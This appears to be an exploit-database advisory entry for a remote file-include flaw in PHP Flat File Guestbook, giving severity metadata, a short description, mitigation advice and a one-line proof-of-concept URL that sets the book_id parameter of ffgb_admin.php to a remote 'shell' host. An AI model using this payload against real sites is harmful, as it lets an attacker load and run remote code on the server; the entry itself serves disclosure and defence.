header-logo
Suggest Exploit
vendor:
PHP Flat File Guestbook
by:
Unknown
7.5
CVSS
HIGH
Remote File-Include
98
CWE
Product Name: PHP Flat File Guestbook
Affected Version From: All versions
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:php_flat_file_guestbook:php_flat_file_guestbook
Metasploit:
Other Scripts:
Platforms Tested:
2011

PHP Flat File Guestbook Remote File-Include Vulnerability

PHP Flat File Guestbook is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Mitigation:

To mitigate this vulnerability, it is recommended to validate and sanitize user-supplied input before using it in file inclusion functions.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/49138/info

PHP Flat File Guestbook is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible. 

http://www.example.com/[path]/ffgb_admin.php?book_id=http://shell?